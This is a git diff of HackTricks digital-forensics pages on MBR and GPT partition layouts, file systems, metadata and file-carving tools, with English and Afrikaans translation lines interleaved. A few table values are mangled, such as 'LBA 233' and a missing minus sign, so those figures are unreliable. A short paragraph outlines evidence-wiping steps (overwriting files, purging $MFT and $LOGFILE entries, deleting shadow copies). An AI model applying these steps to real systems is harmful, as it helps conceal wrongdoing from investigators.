From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
Vanaf die **byte 440 tot 443** van die MBR kan jy die **Windows Disk Signature** vind (as Windows gebruik word). Die logiese aanduiding van die harde skyf hang af van die Windows Disk Signature. Die verandering van hierdie handtekening kan voorkom dat Windows opstart (hulpmiddel: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
![](<../../../.gitbook/assets/image (493).png>)
**Format**
**Formaat**
| Offset | Length | Item |
| Offset | Lengte | Item |
| ----------- | ---------- | ------------------- |
| 0 (0x00) | 446(0x1BE) | Boot code |
| 446 (0x1BE) | 16 (0x10) | First Partition |
| 462 (0x1CE) | 16 (0x10) | Second Partition |
| 478 (0x1DE) | 16 (0x10) | Third Partition |
| 494 (0x1EE) | 16 (0x10) | Fourth Partition |
| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA |
| 0 (0x00) | 446(0x1BE) | Opstartkode |
| 446 (0x1BE) | 16 (0x10) | Eerste Partisie |
| 462 (0x1CE) | 16 (0x10) | Tweede Partisie |
| 478 (0x1DE) | 16 (0x10) | Derde Partisie |
| 494 (0x1EE) | 16 (0x10) | Vierde Partisie |
| 510 (0x1FE) | 2 (0x2) | Handtekening 0x55 0xAA |
**Partition Record Format**
**Partisie Rekord Formaat**
| Offset | Length | Item |
| Offset | Lengte | Item |
| --------- | -------- | ------------------------------------------------------ |
| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) |
| 1 (0x01) | 1 (0x01) | Start head |
| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) |
| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits |
| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | End head |
| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) |
| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits |
| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) |
| 12 (0x0C) | 4 (0x04) | Sectors in partition |
| 0 (0x00) | 1 (0x01) | Aktiewe vlag (0x80 = opstartbaar) |
| 1 (0x01) | 1 (0x01) | Beginkop |
| 2 (0x02) | 1 (0x01) | Beginsektor (bits 0-5); boonste bits van silinder (6-7) |
| 3 (0x03) | 1 (0x01) | Begin silinder laagste 8 bits |
| 4 (0x04) | 1 (0x01) | Partisie tipe kode (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | Eindkop |
| 6 (0x06) | 1 (0x01) | Eindsektor (bits 0-5); boonste bits van silinder (6-7) |
| 7 (0x07) | 1 (0x01) | Eind silinder laagste 8 bits |
| 8 (0x08) | 4 (0x04) | Sektors voor partisie (little endian) |
| 12 (0x0C) | 4 (0x04) | Sektors in partisie |
In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
Om 'n MBR in Linux te monteer, moet jy eers die beginverskuiwing kry (jy kan `fdisk` en die `p`-opdrag gebruik)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
And then use the following code
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
En gebruik dan die volgende kode
```bash
#Mount MBR in Linux
mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA (Logiese blokadressering)**
**LBA (Logical block addressing)**
**Logiese blokadressering** (**LBA**) is 'n algemene skema wat gebruik word om die ligging van blokke data op rekenaarstoorapparate, gewoonlik sekondêre stoorstelsels soos harde skywe, te spesifiseer. LBA is 'n besonder eenvoudige lineêre adresseringstelsel; blokke word geïdentifiseer deur 'n heelgetalindeks, waar die eerste blok LBA 0 is, die tweede LBA 1, en so aan.
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
### GPT (GUID-partisietabel)
### GPT (GUID Partition Table)
Die GUID-partisietabel, bekend as GPT, word verkies vir sy verbeterde vermoëns in vergelyking met MBR (Meester Opstartrekord). Kenmerkend vir sy unieke identifiseerder vir partisies, steek GPT uit op verskeie maniere:
The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways:
- **Ligging en Grootte**: Beide GPT en MBR begin by **sektor 0**. Tog werk GPT met **64-bits**, teenoor MBR se 32-bits.
- **Partisiebeperkings**: GPT ondersteun tot **128 partisies** op Windows-stelsels en kan tot **9.4ZB** data akkommodeer.
- **Partisienames**: Bied die vermoë om partisies te benoem met tot 36 Unicode-karakters.
- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits.
- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data.
- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters.
**Databestendigheid en -herwinning**:
**Data Resilience and Recovery**:
- **Redundansie**: Anders as MBR beperk GPT partisionering en opstartdata nie tot 'n enkele plek nie. Dit dupliseer hierdie data oor die skyf, wat data-integriteit en bestendigheid verbeter.
- **Sikliese Redundansie Kontrole (CRC)**: GPT gebruik CRC om data-integriteit te verseker. Dit monitor aktief vir datakorrupsie, en wanneer dit opgespoor word, probeer GPT om die gekorruppeerde data van 'n ander skyfplek te herstel.
- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience.
- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location.
**Beskermende MBR (LBA0)**:
**Protective MBR (LBA0)**:
- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
- GPT handhaaf agterwaartse verenigbaarheid deur middel van 'n beskermende MBR. Hierdie funksie bly in die erfenis MBR-ruimte, maar is ontwerp om te voorkom dat ouer MBR-gebaseerde hulpprogramme GPT-skywe per ongeluk oorskryf, en sodoende die data-integriteit op GPT-geformateerde skywe beskerm.
![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>)
**Hybrid MBR (LBA 0 + GPT)**
**Hibriede MBR (LBA 0 + GPT)**
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
In bedryfstelsels wat **GPT-gebaseerde opstart deur BIOS**-dienste ondersteun eerder as EFI, kan die eerste sektor ook steeds gebruik word om die eerste stadium van die **opstartlader**-kode te stoor, maar **aangepas** om **GPT-partisies** te herken. Die opstartlader in die MBR mag nie 'n sektor-grootte van 512 byte aanneem nie.
**Partition table header (LBA 1)**
**Partisietabelkop (LBA 1)**
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
Die partisietabelkop definieer die bruikbare blokke op die skyf. Dit definieer ook die aantal en grootte van die partisieinskrywings wat die partisietabel uitmaak (offsets 80 en 84 in die tabel).
| Offset | Length | Contents |
| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)on little-endian machines) |
| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 |
| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) |
| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation |
| 20 (0x14) | 4 bytes | Reserved; must be zero |
| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) |
| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) |
| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA + 1) |
| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA 1) |
| 56 (0x38) | 16 bytes | Disk GUID in mixed endian |
| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) |
| 80 (0x50) | 4 bytes | Number of partition entries in array |
| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) |
| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian |
| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) |
| Offset | Lengte | Inhoud |
| --------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 byte | Handtekening ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h of 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)op klein-eindige masjiene) |
| 8 (0x08) | 4 byte | Hersiening 1.0 (00h 00h 01h 00h) vir UEFI 2.8 |
| 12 (0x0C) | 4 byte | Kopgrootte in klein-eindige (in byte, gewoonlik 5Ch 00h 00h 00h of 92 byte) |
| 16 (0x10) | 4 byte | [CRC32](https://en.wikipedia.org/wiki/CRC32) van die kop (offset +0 tot kopgrootte) in klein-eindige, met hierdie veld nul gemaak tydens berekening |
| 20 (0x14) | 4 byte | Voorbehou; moet nul wees |
| 24 (0x18) | 8 byte | Huidige LBA (ligging van hierdie kopie van die kop) |
| 32 (0x20) | 8 byte | Rugsteun LBA (ligging van die ander kopie van die kop) |
| 40 (0x28) | 8 byte | Eerste bruikbare LBA vir partisies (laaste LBA van primêre partisietabel + 1) |
| 48 (0x30) | 8 byte | Laaste bruikbare LBA (eerste LBA van sekondêre partisietabel - 1) |
| 56 (0x38) | 16 byte | Skyf-GUID in gemengde eindige |
| 72 (0x48) | 8 byte | Begin-LBA van 'n reeks partisieinskrywings (altyd 2 in primêre kopie) |
| 80 (0x50) | 4 byte | Aantal partisieinskrywings in reeks |
| 84 (0x54) | 4 byte | Grootte van 'n enkele partisieinskrywing (gewoonlik 80h of 128) |
| 88 (0x58) | 4 byte | CRC32 van die reeks partisieinskrywings in klein-eindige |
| 92 (0x5C) | \* | Voorbehou; moet nulle wees vir die res van die blok (420 byte vir 'n sektorgrootte van 512 byte; maar kan meer wees met groter sektorgroottes) |
**Partition entries (LBA 233)**
**Partisieinskrywings (LBA 233)**
| GUID partition entry format | | |
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
| Offset | Length | Contents |
| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) |
| 16 (0x10) | 16 bytes | Unique partition GUID (mixed endian) |
| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) |
| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) |
| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) |
| GUID-partisieinskrywingsformaat | | |
| ------------------------------ | -------- | ------------------------------------------------------------------------------------------------------------------- |
| Offset | Lengte | Inhoud |
| 0 (0x00) | 16 byte | [Partisietipe-GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (gemengde eindige) |
| 16 (0x10) | 16 byte | Unieke partisie-GUID (gemengde eindige) |
| 32 (0x20) | 8 byte | Eerste LBA ([klein-eindige](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 byte | Laaste LBA (inklusief, gewoonlik oneweredig) |
| 48 (0x30) | 8 byte | Kenmerkvlaggies (bv. bit 60 dui op skryfbeskerming) |
| 56 (0x38) | 72 byte | Partisienaam (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE-kode-eenhede) |
**Partitions Types**
**Partisietipes**
![](<../../../.gitbook/assets/image (492).png>)
More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
Meer partisietipes in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
### Inspecting
### Inspekteer
After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
Nadat die forensiese beeld met [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) gemoniteer is, kan jy die eerste sektor inspekteer met die Windows-hulpmiddel [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In die volgende afbeelding is 'n **MBR** op **sektor 0** opgespoor en geïnterpreteer:
![](<../../../.gitbook/assets/image (494).png>)
If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
As dit 'n **GPT-tabel in plaas van 'n MBR** was, sou die handtekening _EFI PART_ in **sektor 1** verskyn (wat in die vorige afbeelding leeg is).
## Lêerstelsels
## File-Systems
### Windows file-systems list
### Lys van Windows-lêerstelsels
* **FAT12/16**: MSDOS, WIN95/98/NT/200
* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
@ -165,81 +162,81 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
### FAT
The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
Die **FAT (File Allocation Table)** lêerstelsel is ontwerp rondom sy kernkomponent, die lêertoewysingstabel, wat by die begin van die volume geplaas is. Hierdie stelsel beskerm data deur **twee kopieë** van die tabel te behou, wat data-integriteit verseker selfs as een daarvan beskadig is. Die tabel, tesame met die hoofmap, moet in 'n **vasgestelde posisie** wees, wat noodsaaklik is vir die opstartproses van die stelsel.
The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
Die basiese eenheid van stoor van die lêerstelsel is 'n **kluster, gewoonlik 512B**, wat uit verskeie sektore bestaan. FAT het deur weergawes geëvolueer:
- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX).
- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters.
- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume.
- **FAT12**, wat 12-bits klusteradres ondersteun en tot 4078 klusters hanteer (4084 met UNIX).
- **FAT16**, wat verbeter tot 16-bits adresse, en dus tot 65,517 klusters kan akkommodeer.
- **FAT32**, wat verder gevorder het met 32-bits adresse, wat 'n indrukwekkende 268,435,456 klusters per volume moontlik maak.
A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage.
'n Belangrike beperking oor alle FAT-weergawes is die **maksimum lêergrootte van 4GB**, wat opgelê word deur die 32-bits veld wat vir lêergrootte stoor gebruik word.
Key components of the root directory, particularly for FAT12 and FAT16, include:
Sleutelkomponente van die hoofgids, veral vir FAT12 en FAT16, sluit in:
- **File/Folder Name** (up to 8 characters)
- **Attributes**
- **Creation, Modification, and Last Access Dates**
- **FAT Table Address** (indicating the start cluster of the file)
- **File Size**
- **Lêer/Map Naam** (tot 8 karakters)
- **Eienskappe**
- **Skep-, Wysigings- en Laaste Toegangsdatums**
- **FAT Tabeladres** (wat die beginkluster van die lêer aandui)
- **Lêergrootte**
### EXT
**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
**Ext2** is die mees algemene lêerstelsel vir **nie-joernalering** partisies (**partisies wat nie veel verander nie**) soos die opstartpartisie. **Ext3/4** is **joernalering** en word gewoonlik gebruik vir die **res van die partisies**.
## **Metadata**
Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like:
Sommige lêers bevat metadata. Hierdie inligting gaan oor die inhoud van die lêer wat soms interessant kan wees vir 'n analis as gevolg van die lêertipe, wat inligting soos die volgende kan bevat:
* Title
* MS Office Version used
* Author
* Dates of creation and last modification
* Model of the camera
* GPS coordinates
* Image information
* Titel
* MS Office-weergawe wat gebruik is
* Outeur
* Skep- en laaste wysigingsdatums
* Kamera model
* GPS-koördinate
* Beeldinligting
You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
Jy kan hulpmiddels soos [**exiftool**](https://exiftool.org) en [**Metadiver**](https://www.easymetadata.com/metadiver-2/) gebruik om die metadata van 'n lêer te verkry.
## **Deleted Files Recovery**
## **Herwinning van Verwyderde Lêers**
### Logged Deleted Files
### Gelogde Verwyderde Lêers
As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
Soos voorheen gesien is daar verskeie plekke waar die lêer steeds gestoor word nadat dit "verwyder" is. Dit is omdat die verwydering van 'n lêer uit 'n lêerstelsel dit gewoonlik merk as verwyder, maar die data word nie geraak nie. Daarom is dit moontlik om die rekords van die lêers (soos die MFT) te ondersoek en die verwyderde lêers te vind.
Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
Die bedryfstelsel stoor ook gewoonlik baie inligting oor lêerstelselveranderinge en rugsteun, so dit is moontlik om te probeer om dit te gebruik om die lêer of soveel moontlike inligting te herwin.
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### **File Carving**
### **Lêer Carving**
**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
**Lêer carving** is 'n tegniek wat probeer om lêers in die massa data te vind. Daar is 3 hoofmaniere waarop sulke gereedskap werk: **Gebaseer op lêertipes se koppe en voette**, gebaseer op lêertipes se **strukture** en gebaseer op die **inhoud** self.
Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
Let daarop dat hierdie tegniek **nie werk om gefragmenteerde lêers te herwin nie**. As 'n lêer **nie in aaneenlopende sektore gestoor word nie**, sal hierdie tegniek dit nie kan vind nie, of ten minste 'n deel daarvan.
There are several tools that you can use for file Carving indicating the file types you want to search for
Daar is verskeie gereedskap wat jy kan gebruik vir lêer Carving deur die lêertipes aan te dui wat jy wil soek
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### Data Stream **C**arving
### Datastroom **C**arving
Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
Datastroom Carving is soortgelyk aan Lêer Carving, maar **in plaas daarvan om volledige lêers te soek, soek dit na interessante fragmente** van inligting.\
Byvoorbeeld, in plaas daarvan om 'n volledige lêer te soek wat gelogde URL's bevat, sal hierdie tegniek soek na URL's.
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### Secure Deletion
### Veilige Verwydering
Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
Daar is natuurlik maniere om lêers en dele van logboeke oor hulle **"veilig" te verwyder**. Dit is byvoorbeeld moontlik om die inhoud van 'n lêer herhaaldelik met rommeldata te **oorlê**, en dan die **logboeke** van die **$MFT** en **$LOGFILE** oor die lêer te **verwyder**, en die **Volume Shadow Copies** te **verwyder**.\
Jy mag opmerk dat selfs nadat daardie aksie uitgevoer is, daar **ander dele is waar die bestaan van die lêer steeds gelog word**, en dit is waar en deel van die forensiese professionele se werk is om dit te vind.
## References
## Verwysings
* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
@ -249,14 +246,14 @@ You may notice that even performing that action there might be **other parts whe
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

102
forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View file

@ -1,136 +1,124 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
# Carving & Recovery tools
# Carving & Herstelgereedskap
More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
Meer gereedskap in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
## Autopsy
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files.
Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer insluk om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelders en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie.
## Binwalk <a href="#binwalk" id="binwalk"></a>
**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
**Useful commands**:
**Binwalk** is 'n gereedskap vir die analise van binêre lêers om ingebedde inhoud te vind. Dit kan geïnstalleer word via `apt` en die bronkode is op [GitHub](https://github.com/ReFirmLabs/binwalk).
**Nuttige opdragte**:
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types.
'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes.
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
## **Scalpel**
**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_).
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
